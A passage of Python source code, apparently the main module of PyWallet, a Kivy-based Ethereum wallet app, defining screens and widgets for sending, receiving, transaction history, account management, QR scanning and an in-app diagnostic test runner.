ethereum.utils import normalize_address\nfrom kivy.app import App\nfrom kivy.clock import Clock, mainthread\nfrom kivy.core.clipboard import Clipboard\nfrom kivy.core.window import Window\nfrom kivy.logger import LOG_LEVELS, Logger\nfrom kivy.metrics import dp\nfrom kivy.properties import (DictProperty, NumericProperty, ObjectProperty,\n StringProperty)\nfrom kivy.storage.jsonstore import JsonStore\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.uix.screenmanager import Screen\nfrom kivy.uix.scrollview import ScrollView\nfrom kivy.utils import get_color_from_hex, platform\nfrom kivymd.bottomsheet import MDListBottomSheet\nfrom kivymd.button import MDFlatButton, MDIconButton\nfrom kivymd.color_definitions import colors\nfrom kivymd.dialog import MDDialog\nfrom kivymd.label import MDLabel\nfrom kivymd.list import (ILeftBodyTouch, OneLineListItem, TwoLineIconListItem,\n TwoLineListItem)\nfrom kivymd.navigationdrawer import NavigationDrawerHeaderBase\nfrom kivymd.selectioncontrols import MDSwitch\nfrom kivymd.snackbar import Snackbar\nfrom kivymd.textfields import MDTextField\nfrom kivymd.theming import ThemeManager\nfrom kivymd.toolbar import Toolbar\nfrom PIL import Image as PILImage\nfrom raven import Client\nfrom raven.conf import setup_logging\nfrom raven.handlers.logging import SentryHandler\nfrom requests.exceptions import ConnectionError\n\nfrom pywalib import (ROUND_DIGITS, InsufficientFundsException,\n NoTransactionFoundException, PyWalib,\n UnknownEtherscanException)\nfrom testsuite import suite\nfrom version import __version__\n\n# monkey patching PIL, until it gets monkey patched upstream, refs:\n# https://github.com/kivy/kivy/issues/5460\n# and refs:\n# https://github.com/AndreMiras/PyWallet/issues/104\ntry:\n # Pillow\n PILImage.frombytes\n PILImage.Image.tobytes\nexcept AttributeError:\n # PIL\n PILImage.frombytes = PILImage.frombuffer\n PILImage.Image.tobytes = PILImage.Image.tostring\n\nkivy.require('1.10.0')\n\n# Time before loading the next screen.\n# The idea is to let the application render before trying to add child widget,\n# refs #122.\nSCREEN_SWITCH_DELAY = 0.4\n\n\ndef run_in_thread(fn):\n \"\"\"\n Decorator to run a function in a 
thread.\n >>> 1 + 1\n 2\n >>> @run_in_thread\n ... def threaded_sleep(seconds):\n ... from time import sleep\n ... sleep(seconds)\n >>> thread = threaded_sleep(0.1)\n >>> type(thread)\n \n >>> thread.is_alive()\n True\n >>> thread.join()\n >>> thread.is_alive()\n False\n \"\"\"\n def run(*k, **kw):\n t = threading.Thread(target=fn, args=k, kwargs=kw)\n t.start()\n return t\n return run\n\n\nclass NavigationDrawerTwoLineListItem(\n TwoLineListItem, NavigationDrawerHeaderBase):\n\n address_property = StringProperty()\n\n def __init__(self, **kwargs):\n super(NavigationDrawerTwoLineListItem, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n \"\"\"\n Binds Controller.current_account property.\n \"\"\"\n self.controller = App.get_running_app().controller\n self.controller.bind(\n current_account=lambda _, value: self.on_current_account(value))\n\n def on_current_account(self, account):\n # e.g. deleting the last account would set\n # Controller.current_account to None\n if account is None:\n return\n address = \"0x\" + account.address.encode(\"hex\")\n self.address_property = address\n\n def _update_specific_text_color(self, instance, value):\n pass\n\n def _set_active(self, active, list):\n pass\n\n\nclass CustomMDSwitch(MDSwitch):\n \"\"\"\n Workaround for an MDSwitch bug, refs:\n https://gitlab.com/kivymd/KivyMD/issues/99\n \"\"\"\n\n def _set_colors(self, *args):\n \"\"\"\n Overrides `MDSwitch._set_colors()`; fixes the missing attribute\n `thumb_color_disabled`, refs:\n https://gitlab.com/kivymd/KivyMD/issues/99\n \"\"\"\n super(CustomMDSwitch, self)._set_colors(*args)\n self.thumb_color_disabled = get_color_from_hex(colors['Grey']['800'])\n\n\nclass IconLeftWidget(ILeftBodyTouch, MDIconButton):\n pass\n\n\nclass FloatInput(MDTextField):\n \"\"\"\n Accepts float numbers only.\n \"\"\"\n\n pat = re.compile('[^0-9]')\n\n def insert_text(self, substring, from_undo=False):\n pat = self.pat\n if '.' 
in self.text:\n s = re.sub(pat, '', substring)\n else:\n s = '.'.join([re.sub(pat, '', s) for s in substring.split('.', 1)])\n return super(FloatInput, self).insert_text(s, from_undo=from_undo)\n\n\nclass PasswordForm(BoxLayout):\n\n password = StringProperty()\n\n\nclass AliasForm(BoxLayout):\n\n alias = StringProperty()\n address = StringProperty()\n\n def __init__(self, account, **kwargs):\n \"\"\"\n Sets up the current alias for the given account.\n \"\"\"\n super(AliasForm, self).__init__(**kwargs)\n self.address = \"0x\" + account.address.encode(\"hex\")\n try:\n self.alias = Controller.get_address_alias(self.address)\n except KeyError:\n self.alias = ''\n\n\nclass Send(BoxLayout):\n\n password = StringProperty(\"\")\n send_to_address = StringProperty(\"\")\n send_amount = NumericProperty(0)\n\n def __init__(self, **kwargs):\n super(Send, self).__init__(**kwargs)\n\n def verify_to_address_field(self):\n title = \"Input error\"\n body = \"Invalid address field\"\n try:\n normalize_address(self.send_to_address)\n except Exception:\n dialog = Controller.create_dialog(title, body)\n dialog.open()\n return False\n return True\n\n def verify_amount_field(self):\n title = \"Input error\"\n body = \"Invalid amount field\"\n if self.send_amount == 0:\n dialog = Controller.create_dialog(title, body)\n dialog.open()\n return False\n return True\n\n def verify_fields(self):\n \"\"\"\n Verifies address and amount fields are valid.\n \"\"\"\n return self.verify_to_address_field() \\\n and self.verify_amount_field()\n\n def on_unlock_clicked(self, dialog, password):\n self.password = password\n dialog.dismiss()\n\n def prompt_password_dialog(self):\n \"\"\"\n Prompts the password dialog.\n \"\"\"\n title = \"Enter your password\"\n content = PasswordForm()\n dialog = MDDialog(\n title=title,\n content=content,\n size_hint=(.8, None),\n height=dp(250),\n auto_dismiss=False)\n # workaround for MDDialog container size (too small by default)\n dialog.ids.container.size_hint_y = 1\n dialog.add_action_button(\n \"Unlock\",\n action=lambda *x: self.on_unlock_clicked(\n dialog, content.password))\n return dialog\n\n def on_send_click(self):\n if not self.verify_fields():\n Controller.show_invalid_form_dialog()\n return\n dialog = self.prompt_password_dialog()\n dialog.open()\n\n @run_in_thread\n def unlock_send_transaction(self):\n \"\"\"\n Unlocks the account with password in order to sign and publish the\n transaction.\n \"\"\"\n controller = App.get_running_app().controller\n pywalib = controller.pywalib\n address = normalize_address(self.send_to_address)\n amount_eth = round(self.send_amount, ROUND_DIGITS)\n amount_wei = int(amount_eth * pow(10, 18))\n account = controller.pywalib.get_main_account()\n Controller.snackbar_message(\"Unlocking account...\")\n try:\n account.unlock(self.password)\n except ValueError:\n Controller.snackbar_message(\"Could not unlock account\")\n return\n\n Controller.snackbar_message(\"Unlocked! 
Sending transaction...\")\n sender = account.address\n try:\n pywalib.transact(address, value=amount_wei, data='', sender=sender)\n except InsufficientFundsException:\n Controller.snackbar_message(\"Insufficient funds\")\n return\n except UnknownEtherscanException:\n Controller.snackbar_message(\"Unknown error\")\n Logger.error('UnknownEtherscanException', exc_info=True)\n return\n # TODO: handle ConnectionError\n Controller.snackbar_message(\"Sent!\")\n\n def on_password(self, instance, password):\n self.unlock_send_transaction()\n\n\nclass Receive(BoxLayout):\n\n current_account = ObjectProperty(allownone=True)\n address_property = StringProperty()\n\n def __init__(self, **kwargs):\n super(Receive, self).__init__(**kwargs)\n # for some reason setting the timeout to zero\n # crashes with:\n # 'super' object has no attribute '__getattr__'\n # only on first account creation (with auto redirect)\n # and we cannot yet reproduce in unit tests\n timeout = 1\n Clock.schedule_once(lambda dt: self.setup(), timeout)\n\n def setup(self):\n \"\"\"\n Binds Controller current_account and on_alias_updated.\n \"\"\"\n self.controller = App.get_running_app().controller\n self.controller.bind(current_account=self.setter('current_account'))\n self.controller.bind(on_alias_updated=self.on_alias_updated)\n # triggers the update\n self.current_account = self.controller.current_account\n\n def show_address(self, address):\n self.ids.qr_code_id.data = address\n\n def update_address_property(self):\n \"\"\"\n Updates address_property from current_account.\n \"\"\"\n account = self.current_account\n address = \"0x\" + account.address.encode(\"hex\")\n self.address_property = address\n\n def on_current_account(self, instance, account):\n if account is None:\n return\n self.update_address_property()\n\n def on_address_property(self, instance, value):\n self.show_address(value)\n\n def on_alias_updated(self, instance, alias):\n \"\"\"\n Forces account string update, which will triggers an\n AddressButton.on_address_property event.\n \"\"\"\n self.address_property = \"\"\n self.update_address_property()\n\n\nclass History(BoxLayout):\n\n current_account = ObjectProperty(allownone=True)\n\n def __init__(self, **kwargs):\n super(History, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n \"\"\"\n Binds Controller.current_account property.\n \"\"\"\n self.controller = App.get_running_app().controller\n self.controller.bind(current_account=self.setter('current_account'))\n # triggers the update\n self.current_account = self.controller.current_account\n self.controller.bind(accounts_history=self.update_history_list)\n\n def on_current_account(self, instance, account):\n \"\"\"\n Updates with last known (cached values) and update the cache.\n \"\"\"\n self.update_history_list()\n self.fetch_history()\n\n @staticmethod\n def create_item(sent, amount, from_to):\n \"\"\"\n Creates a history list item from parameters.\n \"\"\"\n send_receive = \"Sent\" if sent else \"Received\"\n text = \"%s %sETH\" % (send_receive, amount)\n secondary_text = from_to\n icon = \"arrow-up-bold\" if sent else \"arrow-down-bold\"\n list_item = TwoLineIconListItem(\n text=text, secondary_text=secondary_text)\n icon_widget = IconLeftWidget(icon=icon)\n list_item.add_widget(icon_widget)\n return list_item\n\n @classmethod\n def create_item_from_dict(cls, transaction_dict):\n \"\"\"\n Creates a history list item from a transaction dictionary.\n \"\"\"\n extra_dict = transaction_dict['extra_dict']\n sent = 
extra_dict['sent']\n amount = extra_dict['value_eth']\n from_address = extra_dict['from_address']\n to_address = extra_dict['to_address']\n from_to = to_address if sent else from_address\n list_item = cls.create_item(sent, amount, from_to)\n return list_item\n\n @mainthread\n def update_history_list(self, instance=None, value=None):\n \"\"\"\n Updates the history list widget from last known (cached) values.\n \"\"\"\n if self.current_account is None:\n return\n address = '0x' + self.current_account.address.encode(\"hex\")\n try:\n transactions = self.controller.accounts_history[address]\n except KeyError:\n transactions = []\n # new transactions first, but do not change the list using reverse()\n transactions = transactions[::-1]\n history_list_id = self.ids.history_list_id\n history_list_id.clear_widgets()\n for transaction in transactions:\n list_item = History.create_item_from_dict(transaction)\n history_list_id.add_widget(list_item)\n\n @run_in_thread\n def fetch_history(self):\n if self.current_account is None:\n return\n address = '0x' + self.current_account.address.encode(\"hex\")\n try:\n transactions = PyWalib.get_transaction_history(address)\n except ConnectionError:\n Controller.on_history_connection_error()\n Logger.warning('ConnectionError', exc_info=True)\n return\n except NoTransactionFoundException:\n transactions = []\n except ValueError:\n # most likely the JSON object could not be decoded, refs #91\n Controller.on_history_value_error()\n # currently logged as an error, because we want more insight\n # in order to eventually handle it more specifically\n Logger.error('ValueError', exc_info=True)\n return\n # triggers accounts_history observers update\n self.controller.accounts_history[address] = transactions\n\n\nclass SwitchAccount(BoxLayout):\n\n def on_release(self, list_item):\n \"\"\"\n Sets Controller.current_account and switches to previous screen.\n \"\"\"\n # sets Controller.current_account\n self.selected_list_item = list_item\n self.controller.current_account = list_item.account\n # switches to previous screen\n self.controller.screen_manager_previous()\n\n def create_item(self, account):\n \"\"\"\n Creates an account list item from given account.\n \"\"\"\n address = \"0x\" + account.address.encode(\"hex\")\n # gets the alias if exists\n try:\n text = Controller.get_address_alias(address)\n except KeyError:\n text = address\n list_item = OneLineListItem(text=text)\n # makes sure the address doesn't overlap on small screen\n list_item.ids._lbl_primary.shorten = True\n list_item.account = account\n list_item.bind(on_release=lambda x: self.on_release(x))\n return list_item\n\n def load_account_list(self):\n \"\"\"\n Fills account list widget from library account list.\n \"\"\"\n self.controller = App.get_running_app().controller\n account_list_id = self.ids.account_list_id\n account_list_id.clear_widgets()\n accounts = self.controller.pywalib.get_account_list()\n for account in accounts:\n list_item = self.create_item(account)\n account_list_id.add_widget(list_item)\n\n\nclass Overview(BoxLayout):\n\n current_account = ObjectProperty(allownone=True)\n current_account_string = StringProperty()\n\n def __init__(self, **kwargs):\n super(Overview, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n \"\"\"\n Binds Controller current_account and on_alias_updated.\n \"\"\"\n self.controller = App.get_running_app().controller\n self.controller.bind(current_account=self.setter('current_account'))\n 
self.controller.bind(on_alias_updated=self.on_alias_updated)\n # triggers the update\n self.current_account = self.controller.current_account\n\n def update_current_account_string(self):\n \"\"\"\n Updates current_account_string from current_account.\n \"\"\"\n if self.current_account is None:\n return\n account = self.current_account\n address = \"0x\" + account.address.encode(\"hex\")\n self.current_account_string = address\n\n def on_current_account(self, instance, account):\n \"\"\"\n Updates current_account_string and fetches the new account balance.\n \"\"\"\n self.update_current_account_string()\n self.controller.fetch_balance()\n\n def on_alias_updated(self, instance, alias):\n \"\"\"\n Forces account string update, which will triggers an\n AddressButton.on_address_property event.\n \"\"\"\n self.current_account_string = \"\"\n self.update_current_account_string()\n\n\nclass PWSelectList(BoxLayout):\n\n selected_item = ObjectProperty()\n\n def __init__(self, **kwargs):\n self._items = kwargs.pop('items')\n super(PWSelectList, self).__init__(**kwargs)\n self._setup()\n\n def on_release(self, item):\n self.selected_item = item\n\n def _setup(self):\n address_list = self.ids.address_list_id\n for item in self._items:\n item.bind(on_release=lambda x: self.on_release(x))\n address_list.add_widget(item)\n\n\nclass ImportKeystore(BoxLayout):\n\n keystore_path = StringProperty()\n\n def __init__(self, **kwargs):\n super(ImportKeystore, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n self.controller = App.get_running_app().controller\n self.keystore_path = self.controller.get_keystore_path()\n accounts = self.controller.pywalib.get_account_list()\n if len(accounts) == 0:\n title = \"No keystore found.\"\n body = \"Import or create one.\"\n dialog = Controller.create_dialog(title, body)\n dialog.open()\n\n\n# TODO: also make it possible to update PBKDF2\n# TODO: create a generic password form\n# TODO: create a generic account form\nclass ManageExisting(BoxLayout):\n\n # e.g. 
when the last account was deleted\n current_account = ObjectProperty(allownone=True)\n address_property = StringProperty()\n current_password = StringProperty()\n new_password1 = StringProperty()\n new_password2 = StringProperty()\n\n def __init__(self, **kwargs):\n super(ManageExisting, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n \"\"\"\n Binds Controller.current_account property.\n \"\"\"\n self.controller = App.get_running_app().controller\n self.pywalib = self.controller.pywalib\n self.controller.bind(current_account=self.setter('current_account'))\n # triggers the update\n self.current_account = self.controller.current_account\n\n def verify_current_password_field(self):\n \"\"\"\n Makes sure passwords are matching.\n \"\"\"\n account = self.current_account\n password = self.current_password\n # making sure it's locked first\n account.lock()\n try:\n account.unlock(password)\n except ValueError:\n return False\n return True\n\n def verify_password_field(self):\n \"\"\"\n Makes sure passwords are matching and are not void.\n \"\"\"\n passwords_matching = self.new_password1 == self.new_password2\n passwords_not_void = self.new_password1 != ''\n return passwords_matching and passwords_not_void\n\n def verify_fields(self):\n \"\"\"\n Verifies password fields are valid.\n \"\"\"\n return self.verify_password_field()\n\n def show_redirect_dialog(self):\n title = \"Account deleted, redirecting...\"\n body = \"\"\n body += \"Your account was deleted, \"\n body += \"you will be redirected to the overview.\"\n dialog = Controller.create_dialog(title, body)\n dialog.open()\n\n def on_delete_account_yes(self, dialog):\n \"\"\"\n Deletes the account, discards the warning dialog,\n shows an info popup and redirects to the landing page.\n \"\"\"\n account = self.current_account\n self.pywalib.delete_account(account)\n dialog.dismiss()\n self.controller.current_account = None\n self.show_redirect_dialog()\n self.controller.load_landing_page()\n\n def prompt_no_account_error(self):\n \"\"\"\n Prompts an error since no account is selected for deletion, refs:\n https://github.com/AndreMiras/PyWallet/issues/90\n \"\"\"\n title = \"No account selected.\"\n body = \"No account selected for deletion.\"\n dialog = Controller.create_dialog(title, body)\n dialog.open()\n\n def prompt_delete_account_dialog(self):\n \"\"\"\n Prompt a confirmation dialog before deleting the account.\n \"\"\"\n if self.current_account is None:\n self.prompt_no_account_error()\n return\n title = \"Are you sure?\"\n body = \"\"\n body += \"This action cannot be undone.\\n\"\n body += \"Are you sure you want to delete this account?\\n\"\n dialog = Controller.create_dialog_helper(title, body)\n dialog.add_action_button(\n \"No\",\n action=lambda *x: dialog.dismiss())\n dialog.add_action_button(\n \"Yes\",\n action=lambda *x: self.on_delete_account_yes(dialog))\n dialog.open()\n\n @run_in_thread\n def update_password(self):\n \"\"\"\n Update account password with new password provided.\n \"\"\"\n if not self.verify_fields():\n Controller.show_invalid_form_dialog()\n return\n Controller.snackbar_message(\"Verifying current password...\")\n if not self.verify_current_password_field():\n Controller.snackbar_message(\"Wrong account password\")\n return\n pywalib = self.controller.pywalib\n account = self.current_account\n new_password = self.new_password1\n Controller.snackbar_message(\"Updating account...\")\n pywalib.update_account_password(account, new_password=new_password)\n 
Controller.snackbar_message(\"Updated!\")\n\n def on_current_account(self, instance, account):\n # e.g. deleting the last account, would set\n # Controller.current_account to None\n if account is None:\n return\n address = \"0x\" + account.address.encode(\"hex\")\n self.address_property = address\n\n\nclass CreateNewAccount(BoxLayout):\n \"\"\"\n PBKDF2 iterations choice is a security vs speed trade off:\n https://security.stackexchange.com/q/3959\n \"\"\"\n\n alias = StringProperty()\n new_password1 = StringProperty()\n new_password2 = StringProperty()\n\n def __init__(self, **kwargs):\n super(CreateNewAccount, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n \"\"\"\n Sets security vs speed default values.\n Plus hides the advanced widgets.\n \"\"\"\n self.security_slider = self.ids.security_slider_id\n self.speed_slider = self.ids.speed_slider_id\n self.security_slider.value = self.speed_slider.value = 50\n self.controller = App.get_running_app().controller\n self.toggle_advanced(False)\n\n def verify_password_field(self):\n \"\"\"\n Makes sure passwords are matching and are not void.\n \"\"\"\n passwords_matching = self.new_password1 == self.new_password2\n passwords_not_void = self.new_password1 != ''\n return passwords_matching and passwords_not_void\n\n def verify_fields(self):\n \"\"\"\n Verifies password fields are valid.\n \"\"\"\n return self.verify_password_field()\n\n @property\n def security_slider_value(self):\n return self.security_slider.value\n\n @staticmethod\n def try_unlock(account, password):\n \"\"\"\n Just as a security measure, verifies we can unlock\n the newly created account with provided password.\n \"\"\"\n # making sure it's locked first\n account.lock()\n try:\n account.unlock(password)\n except ValueError:\n title = \"Unlock error\"\n body = \"\"\n body += \"Couldn't unlock your account.\\n\"\n body += \"The issue should be reported.\"\n dialog = Controller.create_dialog(title, body)\n dialog.open()\n return\n\n @mainthread\n def on_account_created(self, account):\n \"\"\"\n Switches to the newly created account.\n Clears the form.\n \"\"\"\n self.controller.current_account = account\n self.new_password1 = ''\n self.new_password2 = ''\n\n @mainthread\n def toggle_widgets(self, enabled):\n \"\"\"\n Enables/disables account creation widgets.\n \"\"\"\n self.disabled = not enabled\n\n def show_redirect_dialog(self):\n title = \"Account created, redirecting...\"\n body = \"\"\n body += \"Your account was created, \"\n body += \"you will be redirected to the overview.\"\n dialog = Controller.create_dialog(title, body)\n dialog.open()\n\n @run_in_thread\n def create_account(self):\n \"\"\"\n Creates an account from provided form.\n Verify we can unlock it.\n Disables widgets during the process, so the user doesn't try\n to create another account during the process.\n \"\"\"\n self.toggle_widgets(False)\n if not self.verify_fields():\n Controller.show_invalid_form_dialog()\n self.toggle_widgets(True)\n return\n pywalib = self.controller.pywalib\n password = self.new_password1\n security_ratio = self.security_slider_value\n # dividing again by 10, because otherwise it's\n # too slow on smart devices\n security_ratio /= 10.0\n Controller.snackbar_message(\"Creating account...\")\n account = pywalib.new_account(\n password=password, security_ratio=security_ratio)\n Controller.snackbar_message(\"Created!\")\n self.toggle_widgets(True)\n Controller.set_account_alias(account, self.alias)\n self.on_account_created(account)\n 
CreateNewAccount.try_unlock(account, password)\n self.show_redirect_dialog()\n self.controller.load_landing_page()\n return account\n\n def toggle_advanced(self, show):\n \"\"\"\n Shows/hides advanced account creation widgets.\n https://stackoverflow.com/q/23211142/185510\n \"\"\"\n advanced = self.ids.advanced_id\n alpha = 1 if show else 0\n for widget in advanced.children:\n widget.canvas.opacity = alpha\n widget.disabled = not show\n\n\nclass AddressButton(MDFlatButton):\n \"\"\"\n Overrides MDFlatButton, makes the font slightly smaller on mobile\n by using \"Body1\" rather than \"Button\" style.\n Also shortens content size using ellipsis.\n \"\"\"\n\n address_property = StringProperty()\n\n def __init__(self, **kwargs):\n super(AddressButton, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n self.controller = App.get_running_app().controller\n self.set_font_and_shorten()\n\n def set_font_and_shorten(self):\n \"\"\"\n Makes the font slightly smaller on mobile\n by using \"Body1\" rather than \"Button\" style.\n Also shortens content size using ellipsis.\n \"\"\"\n content = self.ids.content\n content.font_style = 'Body1'\n content.shorten = True\n\n def on_parent_size(instance, size):\n # see BaseRectangularButton.width definition\n button_margin = dp(32)\n parent_width = instance.width\n # TODO: the new size should be a min() of\n # parent_width and actual content size\n content.width = parent_width - button_margin\n self.parent.bind(size=on_parent_size)\n # call it once manually, refs:\n # https://github.com/AndreMiras/PyWallet/issues/74\n on_parent_size(self.parent, None)\n\n def on_address_property(self, instance, address):\n \"\"\"\n Sets the address alias if it exists or defaults to the address itself.\n \"\"\"\n try:\n text = Controller.get_address_alias(address)\n except KeyError:\n text = address\n self.text = text\n\n\nclass PWToolbar(Toolbar):\n\n title_property = StringProperty()\n\n def __init__(self, **kwargs):\n super(PWToolbar, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.setup())\n\n def setup(self):\n self.controller = App.get_running_app().controller\n self.navigation = self.controller.ids.navigation_id\n self.load_default_navigation()\n\n def load_default_navigation(self):\n self.left_action_items = [\n ['menu', lambda x: self.toggle_nav_drawer()]\n ]\n self.right_action_items = [\n ['dots-vertical', lambda x: self.toggle_nav_drawer()]\n ]\n\n def toggle_nav_drawer(self):\n self.navigation.toggle_nav_drawer()\n\n\nclass StringIOCBWrite(StringIO):\n \"\"\"\n Inherits StringIO, provides callback on write.\n \"\"\"\n\n def __init__(self, initial_value='', newline='\\n', callback_write=None):\n \"\"\"\n Overloads StringIO.__init__(), making it possible to hook a callback\n for write operations.\n \"\"\"\n self.callback_write = callback_write\n super(StringIOCBWrite, self).__init__(initial_value, newline)\n\n def write(self, s):\n \"\"\"\n Calls the StringIO.write() method then the callback_write with\n given string parameter.\n \"\"\"\n # io.StringIO expects unicode\n s_unicode = s.decode('utf-8')\n super(StringIOCBWrite, self).write(s_unicode)\n if self.callback_write is not None:\n self.callback_write(s_unicode)\n\n\nclass ScrollableLabel(ScrollView):\n \"\"\"\n https://github.com/kivy/kivy/wiki/Scrollable-Label\n \"\"\"\n text = StringProperty('')\n\n\nclass AboutChangelog(BoxLayout):\n changelog_text_property = StringProperty()\n\n def __init__(self, **kwargs):\n super(AboutChangelog, 
self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.load_changelog())\n\n def load_changelog(self):\n changelog_path = os.path.join(\n Controller.src_dir(),\n 'CHANGELOG.md')\n with open(changelog_path, 'r') as f:\n self.changelog_text_property = f.read()\n f.close()\n\n\nclass AboutOverview(BoxLayout):\n project_page_property = StringProperty(\n \"https://github.com/AndreMiras/PyWallet\")\n about_text_property = StringProperty()\n\n def __init__(self, **kwargs):\n super(AboutOverview, self).__init__(**kwargs)\n Clock.schedule_once(lambda dt: self.load_about())\n\n def load_about(self):\n self.about_text_property = \"\" + \\\n \"PyWallet version: %s\\n\" % (__version__) + \\\n \"Project source code and info available on GitHub at: \\n\" + \\\n \"[color=00BFFF][ref=github]\" + \\\n self.project_page_property + \\\n \"[/ref][/color]\"\n\n\nclass AboutDiagnostic(BoxLayout):\n stream_property = StringProperty()\n\n @mainthread\n def callback_write(self, s):\n \"\"\"\n Updates the UI with test progress.\n \"\"\"\n self.stream_property += s\n\n @run_in_thread\n def run_tests(self):\n \"\"\"\n Loads the test suite and hook the callback for reporting progress.\n \"\"\"\n Controller.patch_keystore_path()\n test_suite = suite()\n self.stream_property = \"\"\n stream = StringIOCBWrite(callback_write=self.callback_write)\n verbosity = 2\n unittest.TextTestRunner(\n stream=stream, verbosity=verbosity).run(test_suite)\n\n\nclass OverviewScreen(Screen):\n\n title_property = StringProperty()\n\n def set_title(self, title):\n self.title_property = title\n\n\nclass SwitchAccountScreen(Screen):\n pass\n\n\nclass ManageKeystoreScreen(Screen):\n pass\n\n\nclass AboutScreen(Screen):\n pass\n\n\nclass FlashQrCodeScreen(Screen):\n\n def __init__(self, **kwargs):\n super(FlashQrCodeScreen, self).__init__(**kwargs)\n self.setup()\n\n def setup(self):\n \"\"\"\n Configures scanner to handle only QRCodes.\n \"\"\"\n self.controller = App.get_running_app().controller\n self.zbarcam = self.ids.zbarcam_id\n # loads ZBarCam only when needed, refs:\n # https://github.com/AndreMiras/PyWallet/issues/94\n import zbar\n # enables QRCode scanning only\n self.zbarcam.scanner.set_config(\n zbar.Symbol.NONE, zbar.Config.ENABLE, 0)\n self.zbarcam.scanner.set_config(\n zbar.Symbol.QRCODE, zbar.Config.ENABLE, 1)\n\n def bind_on_symbols(self):\n \"\"\"\n Since the camera doesn't seem to stop properly, we always bind/unbind\n on_pre_enter/on_pre_leave.\n \"\"\"\n self.zbarcam.bind(symbols=self.on_symbols)\n\n def unbind_on_symbols(self):\n \"\"\"\n Since the camera doesn't seem to stop properly, makes sure at least\n events are unbound.\n \"\"\"\n self.zbarcam.unbind(symbols=self.on_symbols)\n\n def on_symbols(self, instance, symbols):\n # also ignores if more than 1 code were found since we don't want to\n # send to the wrong one\n if len(symbols) != 1:\n return\n symbol = symbols[0]\n # update Send screen address\n self.controller.send.send_to_address = symbol.data\n self.zbarcam.play = False\n self.controller.load_landing_page()\n\n\nclass Controller(FloatLayout):\n\n # allownone, e.g. 
when the keystore is void\n current_account = ObjectProperty(allownone=True)\n # pseudo Etherscan cache, keeps a local copy of accounts balance & history\n # accounts_balance[account_0xaddress]\n accounts_balance = DictProperty({})\n # accounts_history[account_0xaddress]\n accounts_history = DictProperty({})\n # keeps track of all dialogs alive\n dialogs = []\n __lock = threading.Lock()\n\n def __init__(self, **kwargs):\n super(Controller, self).__init__(**kwargs)\n keystore_path = Controller.get_keystore_path()\n self.pywalib = PyWalib(keystore_path)\n self.screen_history = []\n self.register_event_type('on_alias_updated')\n Clock.schedule_once(lambda dt: self.load_landing_page())\n Window.bind(on_keyboard=self.on_keyboard)\n\n def on_keyboard(self, window, key, *args):\n \"\"\"\n Handles the back button (Android) and ESC key.\n Goes back to the previous screen or quits the application\n if there's none left.\n \"\"\"\n if key == 27:\n screen_manager = self.screen_manager\n # if we already are in the overview screen, also move back to\n # the overview subtab of the overview screen\n if screen_manager.current == 'overview':\n overview_bnavigation = self.overview_bnavigation\n tab_manager = overview_bnavigation.ids['tab_manager']\n if tab_manager.current != 'overview':\n self.select_overview_subtab()\n return True\n else:\n # if we were already in the overview:overview subtab,\n # then propagates the key which in this case will exit\n # the application\n return False\n self.screen_manager_previous()\n # stops the propagation\n return True\n return False\n\n @property\n def overview_bnavigation(self):\n screen_manager = self.screen_manager\n overview_screen = screen_manager.get_screen('overview')\n overview_bnavigation = overview_screen.ids.overview_bnavigation_id\n return overview_bnavigation\n\n @property\n def overview(self):\n overview_bnavigation = self.overview_bnavigation\n return overview_bnavigation.ids.overview_id\n\n @property\n def history(self):\n return self.overview.ids.history_id\n\n @property\n def switch_account(self):\n screen_manager = self.screen_manager\n switch_account_screen = screen_manager.get_screen('switch_account')\n switch_account_id = switch_account_screen.ids.switch_account_id\n return switch_account_id\n\n @property\n def send(self):\n overview_bnavigation = self.overview_bnavigation\n return overview_bnavigation.ids.send_id\n\n @property\n def manage_keystores(self):\n screen_manager = self.screen_manager\n manage_keystores_screen = screen_manager.get_screen('manage_keystores')\n manage_keystores_bnavigation_id = \\\n manage_keystores_screen.ids.manage_keystores_id\n return manage_keystores_bnavigation_id\n\n @property\n def manage_existing(self):\n manage_keystores = self.manage_keystores\n return manage_keystores.ids.manage_existing_id\n\n @property\n def create_new_account(self):\n manage_keystores = self.manage_keystores\n return manage_keystores.ids.create_new_account_id\n\n @property\n def toolbar(self):\n return self.ids.toolbar_id\n\n @property\n def screen_manager(self):\n return self.ids.screen_manager_id\n\n def set_toolbar_title(self, title):\n self.toolbar.title_property = title\n\n def bind_current_account_balance(self):\n \"\"\"\n Binds the accounts_balance to the Toolbar title.\n \"\"\"\n self.bind(accounts_balance=self.update_toolbar_title_balance)\n\n def unbind_current_account_balance(self):\n \"\"\"\n Unbinds the accounts_balance from the Toolbar title.\n \"\"\"\n self.unbind(accounts_balance=self.update_toolbar_title_balance)\n\n def 
screen_manager_current(self, current, direction=None, history=True):\n screens = {\n 'overview': OverviewScreen,\n 'switch_account': SwitchAccountScreen,\n 'manage_keystores': ManageKeystoreScreen,\n 'flashqrcode': FlashQrCodeScreen,\n 'about': AboutScreen,\n }\n screen_manager = self.screen_manager\n # creates the Screen object if it doesn't exist\n if not screen_manager.has_screen(current):\n screen = screens[current](name=current)\n screen_manager.add_widget(screen)\n if direction is not None:\n screen_manager.transition.direction = direction\n screen_manager.current = current\n if history:\n # do not update history if it's the same screen because we do not\n # want the go back button to behave like it was doing nothing\n if not self.screen_history or self.screen_history[-1] != current:\n self.screen_history.append(current)\n # in this case let's reset since the overview is the root screen\n # because we never want the back button to bring us from overview\n # to another screen\n if current == 'overview':\n self.screen_history = []\n\n def screen_manager_previous(self):\n try:\n previous_screen = self.screen_history.pop(-2)\n except IndexError:\n previous_screen = 'overview'\n self.screen_manager_current(\n previous_screen, direction='right', history=False)\n\n @classmethod\n def show_invalid_form_dialog(cls):\n title = \"Invalid form\"\n body = \"Please check form fields.\"\n dialog = cls.create_dialog(title, body)\n dialog.open()\n\n @staticmethod\n def patch_keystore_path():\n 